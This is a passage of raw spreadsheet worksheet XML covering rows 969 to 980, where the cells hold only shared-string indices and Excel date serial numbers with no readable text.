        <v>8544</v>
      </c>
      <c r="B969" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C969" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D969" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E969" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F969" s="23" t="s">
        <v>10221</v>
      </c>
      <c r="G969" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H969" s="23"/>
      <c r="I969" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J969" s="23"/>
      <c r="K969" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L969" s="24">
        <v>46072.1702662037</v>
      </c>
      <c r="M969" s="24">
        <v>46072.1702662037</v>
      </c>
      <c r="N969" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O969" s="23"/>
      <c r="P969" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q969" s="23"/>
      <c r="R969" s="23"/>
      <c r="S969" s="23"/>
      <c r="T969" s="23"/>
      <c r="U969" s="23"/>
      <c r="V969" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W969" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X969" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y969" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z969" s="24">
        <v>46072.1702662037</v>
      </c>
      <c r="AA969" s="23"/>
      <c r="AB969" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC969" s="23"/>
      <c r="AD969" s="23"/>
      <c r="AE969" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF969" s="23"/>
      <c r="AG969" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH969" s="24"/>
      <c r="AI969" s="23"/>
      <c r="AJ969" s="23"/>
      <c r="AK969" s="23"/>
      <c r="AL969" s="23"/>
      <c r="AM969" s="23"/>
      <c r="AN969" s="23"/>
      <c r="AO969" s="23"/>
      <c r="AP969" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ969" s="24">
        <v>46072.191099537</v>
      </c>
      <c r="AR969" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS969" s="23"/>
      <c r="AT969" s="23"/>
      <c r="AU969" s="23"/>
    </row>
    <row r="970" s="1" customFormat="1" spans="1:47">
      <c r="A970" s="23" t="s">
        <v>8544</v>
      </c>
      <c r="B970" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C970" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D970" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E970" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F970" s="23" t="s">
        <v>10222</v>
      </c>
      <c r="G970" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H970" s="23"/>
      <c r="I970" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J970" s="23"/>
      <c r="K970" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L970" s="24">
        <v>46072.1667939815</v>
      </c>
      <c r="M970" s="24">
        <v>46072.1667939815</v>
      </c>
      <c r="N970" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O970" s="23"/>
      <c r="P970" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q970" s="23"/>
      <c r="R970" s="23"/>
      <c r="S970" s="23"/>
      <c r="T970" s="23"/>
      <c r="U970" s="23"/>
      <c r="V970" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W970" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X970" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y970" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z970" s="24">
        <v>46072.1667939815</v>
      </c>
      <c r="AA970" s="23"/>
      <c r="AB970" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC970" s="23"/>
      <c r="AD970" s="23"/>
      <c r="AE970" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF970" s="23"/>
      <c r="AG970" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH970" s="24"/>
      <c r="AI970" s="23"/>
      <c r="AJ970" s="23"/>
      <c r="AK970" s="23"/>
      <c r="AL970" s="23"/>
      <c r="AM970" s="23"/>
      <c r="AN970" s="23"/>
      <c r="AO970" s="23"/>
      <c r="AP970" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ970" s="24">
        <v>46072.1876273148</v>
      </c>
      <c r="AR970" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS970" s="23"/>
      <c r="AT970" s="23"/>
      <c r="AU970" s="23"/>
    </row>
    <row r="971" s="1" customFormat="1" spans="1:47">
      <c r="A971" s="23" t="s">
        <v>8544</v>
      </c>
      <c r="B971" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C971" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D971" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E971" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F971" s="23" t="s">
        <v>10223</v>
      </c>
      <c r="G971" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H971" s="23"/>
      <c r="I971" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J971" s="23"/>
      <c r="K971" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L971" s="24">
        <v>46072.1626388889</v>
      </c>
      <c r="M971" s="24">
        <v>46072.1626388889</v>
      </c>
      <c r="N971" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O971" s="23"/>
      <c r="P971" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q971" s="23"/>
      <c r="R971" s="23"/>
      <c r="S971" s="23"/>
      <c r="T971" s="23"/>
      <c r="U971" s="23"/>
      <c r="V971" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W971" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X971" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y971" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z971" s="24">
        <v>46072.1626388889</v>
      </c>
      <c r="AA971" s="23"/>
      <c r="AB971" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC971" s="23"/>
      <c r="AD971" s="23"/>
      <c r="AE971" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF971" s="23"/>
      <c r="AG971" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH971" s="24"/>
      <c r="AI971" s="23"/>
      <c r="AJ971" s="23"/>
      <c r="AK971" s="23"/>
      <c r="AL971" s="23"/>
      <c r="AM971" s="23"/>
      <c r="AN971" s="23"/>
      <c r="AO971" s="23"/>
      <c r="AP971" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ971" s="24">
        <v>46072.1834722222</v>
      </c>
      <c r="AR971" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS971" s="23"/>
      <c r="AT971" s="23"/>
      <c r="AU971" s="23"/>
    </row>
    <row r="972" s="1" customFormat="1" spans="1:47">
      <c r="A972" s="23" t="s">
        <v>8544</v>
      </c>
      <c r="B972" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C972" s="23" t="s">
        <v>1977</v>
      </c>
      <c r="D972" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E972" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F972" s="23" t="s">
        <v>10224</v>
      </c>
      <c r="G972" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H972" s="23"/>
      <c r="I972" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J972" s="23"/>
      <c r="K972" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L972" s="24">
        <v>46072.1293634259</v>
      </c>
      <c r="M972" s="24">
        <v>46072.1293634259</v>
      </c>
      <c r="N972" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O972" s="23"/>
      <c r="P972" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q972" s="23"/>
      <c r="R972" s="23"/>
      <c r="S972" s="23"/>
      <c r="T972" s="23"/>
      <c r="U972" s="23"/>
      <c r="V972" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W972" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X972" s="23" t="s">
        <v>8557</v>
      </c>
      <c r="Y972" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z972" s="24">
        <v>46072.1293634259</v>
      </c>
      <c r="AA972" s="23"/>
      <c r="AB972" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC972" s="23"/>
      <c r="AD972" s="23"/>
      <c r="AE972" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF972" s="23"/>
      <c r="AG972" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH972" s="24"/>
      <c r="AI972" s="23"/>
      <c r="AJ972" s="23"/>
      <c r="AK972" s="23"/>
      <c r="AL972" s="23"/>
      <c r="AM972" s="23"/>
      <c r="AN972" s="23"/>
      <c r="AO972" s="23"/>
      <c r="AP972" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ972" s="24">
        <v>46072.1501967593</v>
      </c>
      <c r="AR972" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS972" s="23"/>
      <c r="AT972" s="23"/>
      <c r="AU972" s="23"/>
    </row>
    <row r="973" s="1" customFormat="1" spans="1:47">
      <c r="A973" s="23" t="s">
        <v>8544</v>
      </c>
      <c r="B973" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C973" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D973" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E973" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F973" s="23" t="s">
        <v>10225</v>
      </c>
      <c r="G973" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H973" s="23"/>
      <c r="I973" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J973" s="23"/>
      <c r="K973" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L973" s="24">
        <v>46072.1080787037</v>
      </c>
      <c r="M973" s="24">
        <v>46072.1080787037</v>
      </c>
      <c r="N973" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O973" s="23"/>
      <c r="P973" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q973" s="23"/>
      <c r="R973" s="23"/>
      <c r="S973" s="23"/>
      <c r="T973" s="23"/>
      <c r="U973" s="23"/>
      <c r="V973" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W973" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X973" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y973" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z973" s="24">
        <v>46072.1080787037</v>
      </c>
      <c r="AA973" s="23"/>
      <c r="AB973" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC973" s="23"/>
      <c r="AD973" s="23"/>
      <c r="AE973" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF973" s="23"/>
      <c r="AG973" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH973" s="24"/>
      <c r="AI973" s="23"/>
      <c r="AJ973" s="23"/>
      <c r="AK973" s="23"/>
      <c r="AL973" s="23"/>
      <c r="AM973" s="23"/>
      <c r="AN973" s="23"/>
      <c r="AO973" s="23"/>
      <c r="AP973" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ973" s="24">
        <v>46072.128912037</v>
      </c>
      <c r="AR973" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS973" s="23"/>
      <c r="AT973" s="23"/>
      <c r="AU973" s="23"/>
    </row>
    <row r="974" s="1" customFormat="1" spans="1:47">
      <c r="A974" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B974" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C974" s="23" t="s">
        <v>800</v>
      </c>
      <c r="D974" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E974" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F974" s="23" t="s">
        <v>10226</v>
      </c>
      <c r="G974" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H974" s="23"/>
      <c r="I974" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J974" s="23" t="s">
        <v>10210</v>
      </c>
      <c r="K974" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L974" s="24">
        <v>46071.1287152778</v>
      </c>
      <c r="M974" s="24">
        <v>46071.8772106481</v>
      </c>
      <c r="N974" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O974" s="23"/>
      <c r="P974" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q974" s="23"/>
      <c r="R974" s="23" t="s">
        <v>800</v>
      </c>
      <c r="S974" s="23" t="s">
        <v>10211</v>
      </c>
      <c r="T974" s="23"/>
      <c r="U974" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V974" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W974" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X974" s="23" t="s">
        <v>8675</v>
      </c>
      <c r="Y974" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z974" s="24">
        <v>46071.1297222222</v>
      </c>
      <c r="AA974" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB974" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC974" s="23"/>
      <c r="AD974" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE974" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF974" s="23"/>
      <c r="AG974" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH974" s="24">
        <v>46071.1297453704</v>
      </c>
      <c r="AI974" s="23"/>
      <c r="AJ974" s="23"/>
      <c r="AK974" s="23"/>
      <c r="AL974" s="23"/>
      <c r="AM974" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN974" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO974" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP974" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ974" s="24">
        <v>46071.1505555556</v>
      </c>
      <c r="AR974" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS974" s="23"/>
      <c r="AT974" s="23"/>
      <c r="AU974" s="23"/>
    </row>
    <row r="975" s="1" customFormat="1" spans="1:47">
      <c r="A975" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B975" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C975" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D975" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E975" s="23" t="s">
        <v>8539</v>
      </c>
      <c r="F975" s="23" t="s">
        <v>10227</v>
      </c>
      <c r="G975" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H975" s="23"/>
      <c r="I975" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J975" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K975" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L975" s="24">
        <v>46071.8743865741</v>
      </c>
      <c r="M975" s="24">
        <v>46071.8743865741</v>
      </c>
      <c r="N975" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O975" s="23"/>
      <c r="P975" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q975" s="23"/>
      <c r="R975" s="23" t="s">
        <v>8641</v>
      </c>
      <c r="S975" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T975" s="23"/>
      <c r="U975" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V975" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W975" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X975" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y975" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z975" s="24">
        <v>46071.8748263889</v>
      </c>
      <c r="AA975" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB975" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC975" s="23"/>
      <c r="AD975" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE975" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF975" s="23"/>
      <c r="AG975" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH975" s="24">
        <v>46071.8748726852</v>
      </c>
      <c r="AI975" s="23"/>
      <c r="AJ975" s="23"/>
      <c r="AK975" s="23"/>
      <c r="AL975" s="23"/>
      <c r="AM975" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN975" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO975" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP975" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ975" s="24">
        <v>46071.8956597222</v>
      </c>
      <c r="AR975" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS975" s="23" t="s">
        <v>9833</v>
      </c>
      <c r="AT975" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="AU975" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="976" s="1" customFormat="1" spans="1:47">
      <c r="A976" s="23" t="s">
        <v>8819</v>
      </c>
      <c r="B976" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C976" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="D976" s="23" t="s">
        <v>8820</v>
      </c>
      <c r="E976" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F976" s="23" t="s">
        <v>10228</v>
      </c>
      <c r="G976" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H976" s="23"/>
      <c r="I976" s="23" t="s">
        <v>8479</v>
      </c>
      <c r="J976" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="K976" s="23" t="s">
        <v>8598</v>
      </c>
      <c r="L976" s="24">
        <v>46070.8740509259</v>
      </c>
      <c r="M976" s="24">
        <v>46071.8071064815</v>
      </c>
      <c r="N976" s="23"/>
      <c r="O976" s="23"/>
      <c r="P976" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="Q976" s="23"/>
      <c r="R976" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="S976" s="23" t="s">
        <v>3361</v>
      </c>
      <c r="T976" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U976" s="23" t="s">
        <v>8822</v>
      </c>
      <c r="V976" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W976" s="23" t="s">
        <v>123</v>
      </c>
      <c r="X976" s="23" t="s">
        <v>8436</v>
      </c>
      <c r="Y976" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z976" s="24">
        <v>46071.8116666667</v>
      </c>
      <c r="AA976" s="23"/>
      <c r="AB976" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC976" s="23"/>
      <c r="AD976" s="23" t="s">
        <v>8767</v>
      </c>
      <c r="AE976" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF976" s="23"/>
      <c r="AG976" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH976" s="24"/>
      <c r="AI976" s="23"/>
      <c r="AJ976" s="23"/>
      <c r="AK976" s="23" t="s">
        <v>10229</v>
      </c>
      <c r="AL976" s="23" t="s">
        <v>3700</v>
      </c>
      <c r="AM976" s="23" t="s">
        <v>8708</v>
      </c>
      <c r="AN976" s="23"/>
      <c r="AO976" s="23"/>
      <c r="AP976" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ976" s="24">
        <v>46071.8325</v>
      </c>
      <c r="AR976" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS976" s="23"/>
      <c r="AT976" s="23"/>
      <c r="AU976" s="23"/>
    </row>
    <row r="977" s="1" customFormat="1" spans="1:47">
      <c r="A977" s="23" t="s">
        <v>9250</v>
      </c>
      <c r="B977" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C977" s="23" t="s">
        <v>3040</v>
      </c>
      <c r="D977" s="23" t="s">
        <v>9251</v>
      </c>
      <c r="E977" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F977" s="23" t="s">
        <v>10230</v>
      </c>
      <c r="G977" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H977" s="23"/>
      <c r="I977" s="23" t="s">
        <v>8479</v>
      </c>
      <c r="J977" s="23" t="s">
        <v>3040</v>
      </c>
      <c r="K977" s="23" t="s">
        <v>8598</v>
      </c>
      <c r="L977" s="24">
        <v>46071.6483449074</v>
      </c>
      <c r="M977" s="24">
        <v>46071.6483449074</v>
      </c>
      <c r="N977" s="23"/>
      <c r="O977" s="23"/>
      <c r="P977" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q977" s="23"/>
      <c r="R977" s="23" t="s">
        <v>3040</v>
      </c>
      <c r="S977" s="23" t="s">
        <v>10231</v>
      </c>
      <c r="T977" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U977" s="23" t="s">
        <v>9254</v>
      </c>
      <c r="V977" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W977" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X977" s="23" t="s">
        <v>8484</v>
      </c>
      <c r="Y977" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z977" s="24">
        <v>46071.6489930556</v>
      </c>
      <c r="AA977" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB977" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC977" s="23"/>
      <c r="AD977" s="23" t="s">
        <v>8462</v>
      </c>
      <c r="AE977" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF977" s="23"/>
      <c r="AG977" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH977" s="24">
        <v>46071.6490046296</v>
      </c>
      <c r="AI977" s="23"/>
      <c r="AJ977" s="23"/>
      <c r="AK977" s="23" t="s">
        <v>10232</v>
      </c>
      <c r="AL977" s="23" t="s">
        <v>9256</v>
      </c>
      <c r="AM977" s="23" t="s">
        <v>8441</v>
      </c>
      <c r="AN977" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO977" s="23"/>
      <c r="AP977" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ977" s="24">
        <v>46071.6698263889</v>
      </c>
      <c r="AR977" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS977" s="23"/>
      <c r="AT977" s="23"/>
      <c r="AU977" s="23"/>
    </row>
    <row r="978" s="1" customFormat="1" spans="1:47">
      <c r="A978" s="23" t="s">
        <v>8476</v>
      </c>
      <c r="B978" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C978" s="23" t="s">
        <v>9409</v>
      </c>
      <c r="D978" s="23" t="s">
        <v>8477</v>
      </c>
      <c r="E978" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F978" s="23" t="s">
        <v>10233</v>
      </c>
      <c r="G978" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H978" s="23"/>
      <c r="I978" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J978" s="23" t="s">
        <v>10195</v>
      </c>
      <c r="K978" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L978" s="24">
        <v>46071.4796180556</v>
      </c>
      <c r="M978" s="24">
        <v>46071.4796180556</v>
      </c>
      <c r="N978" s="23"/>
      <c r="O978" s="23"/>
      <c r="P978" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q978" s="23"/>
      <c r="R978" s="23" t="s">
        <v>9409</v>
      </c>
      <c r="S978" s="23" t="s">
        <v>10195</v>
      </c>
      <c r="T978" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U978" s="23" t="s">
        <v>8483</v>
      </c>
      <c r="V978" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W978" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X978" s="23" t="s">
        <v>8658</v>
      </c>
      <c r="Y978" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z978" s="24">
        <v>46071.4802430556</v>
      </c>
      <c r="AA978" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB978" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC978" s="23"/>
      <c r="AD978" s="23" t="s">
        <v>8437</v>
      </c>
      <c r="AE978" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF978" s="23"/>
      <c r="AG978" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH978" s="24">
        <v>46071.4802546296</v>
      </c>
      <c r="AI978" s="23"/>
      <c r="AJ978" s="23"/>
      <c r="AK978" s="23" t="s">
        <v>10196</v>
      </c>
      <c r="AL978" s="23" t="s">
        <v>9413</v>
      </c>
      <c r="AM978" s="23" t="s">
        <v>8487</v>
      </c>
      <c r="AN978" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO978" s="23"/>
      <c r="AP978" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ978" s="24">
        <v>46071.5010763889</v>
      </c>
      <c r="AR978" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS978" s="23"/>
      <c r="AT978" s="23"/>
      <c r="AU978" s="23"/>
    </row>
    <row r="979" s="1" customFormat="1" spans="1:47">
      <c r="A979" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B979" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C979" s="23" t="s">
        <v>3441</v>
      </c>
      <c r="D979" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E979" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F979" s="23" t="s">
        <v>10234</v>
      </c>
      <c r="G979" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H979" s="23"/>
      <c r="I979" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J979" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K979" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L979" s="24">
        <v>46071.4605787037</v>
      </c>
      <c r="M979" s="24">
        <v>46071.4605787037</v>
      </c>
      <c r="N979" s="23"/>
      <c r="O979" s="23"/>
      <c r="P979" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q979" s="23"/>
      <c r="R979" s="23" t="s">
        <v>3441</v>
      </c>
      <c r="S979" s="23" t="s">
        <v>8621</v>
      </c>
      <c r="T979" s="23"/>
      <c r="U979" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V979" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W979" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X979" s="23" t="s">
        <v>8622</v>
      </c>
      <c r="Y979" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z979" s="24">
        <v>46071.4637037037</v>
      </c>
      <c r="AA979" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB979" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC979" s="23"/>
      <c r="AD979" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE979" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF979" s="23"/>
      <c r="AG979" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH979" s="24">
        <v>46071.4637152778</v>
      </c>
      <c r="AI979" s="23"/>
      <c r="AJ979" s="23"/>
      <c r="AK979" s="23"/>
      <c r="AL979" s="23"/>
      <c r="AM979" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN979" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO979" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP979" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ979" s="24">
        <v>46071.484537037</v>
      </c>
      <c r="AR979" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS979" s="23"/>
      <c r="AT979" s="23"/>
      <c r="AU979" s="23"/>
    </row>
    <row r="980" s="1" customFormat="1" spans="1:47">
      <c r="A980" s="23" t="s">
        <v>8399</v>
      </c>
      <c r="B980" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C980" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D980" s="23" t="s">
        <v>8401</v>
      </c>
      <c r="E980" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F980" s="23" t="s">
        <v>10235</v>
      </c>
      <c r="G980" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H980" s="23"/>
      <c r="I980" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J980" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K980" s="23" t="s">
        <v>8404</v>
      </c>
      <c r="L980" s="24">
        <v>46070.4433217593</v>
      </c>
      <c r="M980" s="24">
        <v>46071.4428935185</v>
      </c>
      <c r="N980" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O980" s="23"/>
      <c r="P980" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="Q980" s="23"/>
      <c r="R980" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S980" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T980" s="23"/>
      <c r="U980" s="23" t="s">
        <v>8406</v>
      </c>
      <c r="V980" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W980" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X980" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y980" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z980" s="24">
        <v>46070.4442476852</v>
      </c>
      <c r="AA980" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB980" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC980" s="23"/>
      <c r="AD980" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE980" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF980" s="23"/>
      <c r="AG980" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH980" s="24">
        <v>46070.4442824074</v>
      </c>
      <c r="AI980" s="23"/>
      <c r="AJ980" s="23"/>
      <c r="AK980" s="23" t="s">
